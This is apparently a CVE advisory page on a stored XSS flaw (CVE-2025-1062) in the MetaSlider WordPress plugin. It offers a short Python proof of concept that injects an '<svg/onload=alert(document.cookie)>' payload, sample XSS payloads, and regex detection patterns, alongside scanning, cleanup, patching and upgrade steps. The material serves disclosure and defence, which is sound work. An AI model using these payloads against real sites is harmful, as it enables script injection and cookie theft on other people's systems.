How CVE-2025-1062 Works
The vulnerability affects the MetaSlider WordPress plugin in versions before 3.95.0: plugin settings are not properly sanitized, so an authenticated attacker with admin privileges can inject JavaScript payloads through them. The payloads are stored in the database and execute when other users load the affected slideshow components. The attack bypasses WordPress multisite security restrictions such as the unfiltered_html capability check. The XSS is triggered through crafted slider/gallery parameters that are not sanitized during save operations, so the attack vector persists across page reloads.
DailyCVE Form
Platform: WordPress
Version: <3.95.0
Vulnerability: Stored XSS
Severity: High
Date: 04/08/2025
What Undercode Say:
Proof of Concept (PoC)

```python
import requests

wordpress_url = "http://target.com/wp-admin/admin-post.php"
payload = "<svg/onload=alert(document.cookie)>"
params = {
    'action': 'save_ms_settings',
    'settings': f'{{"test_setting":"{payload}"}}'
}
# Requires admin credentials
response = requests.post(wordpress_url, data=params, cookies={'wordpress_logged_in': 'admin_cookie'})
```
Detection Command

```shell
wpscan --url http://target.com --enumerate vp --plugins-detection mixed
```
```sql
-- Database cleanup (Post-exploitation)
DELETE FROM wp_postmeta WHERE meta_key LIKE '%metaslider%' AND meta_value LIKE '%<script%';
```
Mitigation Rule

```nginx
location ~ /wp-content/plugins/metaslider/ {
    add_header Content-Security-Policy "default-src 'self'";
    add_header X-XSS-Protection "1; mode=block";
}
```
```php
// Temporary patch: strip tags from every string setting, nested ones included.
// array_map('wp_strip_all_tags', ...) only touches the top level and fails on nested arrays.
add_filter('metaslider_save_settings', function ($settings) {
    array_walk_recursive($settings, function (&$v) { if (is_string($v)) { $v = wp_strip_all_tags($v); } });
    return $settings;
}, 10, 1);
```
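The cleanup query above only matches a literal `<script`, which misses the `<svg/onload=...>` payload the PoC itself uses, and the temporary patch sanitizes only what reaches the filter. The following is an added example, not code from this page or from the MetaSlider project, showing the defender-side pieces a practitioner would want for both steps: a scanner over exported settings rows that decodes HTML entities and JSON escapes before matching several injection indicators, and a recursive sanitizer for nested settings structures. It assumes settings are stored as JSON text in wp_options / wp_postmeta and exported to (key, value) pairs; every row and key below is a constructed sample.

```python
"""Defender-side helpers for stored XSS in WordPress plugin settings.

Added example (not from the DailyCVE page or the MetaSlider project).
Assumptions: settings are stored as JSON text and exported to (key, value)
pairs; the rows and keys below are constructed samples, not real data.
"""
import html
import json
import re
from typing import NamedTuple

# Indicators of HTML/JS injection in a value that should hold plain text or
# JSON. A single "<script" check misses event handlers such as <svg/onload=.
PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I),   # <svg/onload=, <img onerror=
    "javascript_uri": re.compile(r"(?:href|src)\s*=\s*['\"]?\s*javascript:", re.I),
    "iframe_object": re.compile(r"<\s*(?:iframe|object|embed)\b", re.I),
}


class Finding(NamedTuple):
    key: str
    kind: str
    snippet: str


def normalise(value: str) -> str:
    """Undo common encodings so an obfuscated payload still matches."""
    value = html.unescape(value)                                  # &lt;svg ... -> <svg ...
    value = re.sub(r"\\u([0-9a-fA-F]{4})",
                   lambda m: chr(int(m.group(1), 16)), value)      # JSON \u003c -> <
    return value.replace("\\/", "/")                              # JSON \/ -> /


def find_xss_indicators(value: str) -> list[str]:
    """Return the names of every pattern that matches the decoded value."""
    text = normalise(value)
    return [kind for kind, rx in PATTERNS.items() if rx.search(text)]


def scan_rows(rows):
    """Scan (key, value) rows and return one Finding per matching pattern."""
    findings = []
    for key, value in rows:
        text = normalise(value)
        for kind in find_xss_indicators(value):
            m = PATTERNS[kind].search(text)
            findings.append(Finding(key, kind, text[m.start():m.end() + 30]))
    return findings


def sanitize_settings(obj):
    """Recursively neutralise HTML in a settings structure (dict/list/str).

    Values are decoded first so an entity- or \\u-encoded payload cannot
    survive a later decode-then-render step, then HTML-escaped. Non-string
    leaves (ints, bools, None) are left untouched.
    """
    if isinstance(obj, dict):
        return {k: sanitize_settings(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [sanitize_settings(v) for v in obj]
    if isinstance(obj, str):
        return html.escape(normalise(obj), quote=True)
    return obj


# Constructed sample rows (hypothetical keys, not real database content).
SAMPLE_ROWS = [
    ("metaslider_example_defaults", '{"width":"700","height":"300","effect":"fade"}'),
    ("metaslider_example_setting",  '{"test_setting":"<svg/onload=alert(document.cookie)>"}'),
    ("metaslider_example_caption",  "&lt;img src=x onerror=alert(1)&gt;"),
    ("metaslider_example_link",     '<a href="javascript:alert(1)">click</a>'),
    ("metaslider_example_custom",   '{"custom":"\\u003cscript\\u003ealert(1)\\u003c/script\\u003e"}'),
    ("metaslider_example_title",    "Summer sale: 50% off on everything"),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"{f.key}: {f.kind} -> {f.snippet!r}")
    raw = json.loads(SAMPLE_ROWS[1][1])
    print(json.dumps(sanitize_settings(raw)))
```

Running the script flags four of the six sample rows (the clean defaults and the plain title pass) and prints the PoC setting with its angle brackets escaped. The sanitizer escapes rather than strips, which avoids regex tag-stripping bypasses but turns legitimate markup in a field into visible text; apply it only to fields that are meant to hold plain text, and keep the page's upgrade to 3.95.0 as the real fix.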
Upgrade path:
```shell
wp plugin update metaslider --version=3.95.0
```
```javascript
// Browser protection: flatten metaslider elements to plain text.
// Assigning textContent back to innerHTML would re-parse any "<" in the text
// as markup, so write to textContent instead. Note that inline handlers such
// as <svg onload> fire while the page is parsed, before DOMContentLoaded.
if (window.location.pathname.includes('metaslider')) {
  document.addEventListener('DOMContentLoaded', () => {
    document.querySelectorAll('[id^="metaslider"]').forEach(el => {
      el.textContent = el.textContent;
    });
  });
}
```
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1062
Extra Source Hub:
Undercode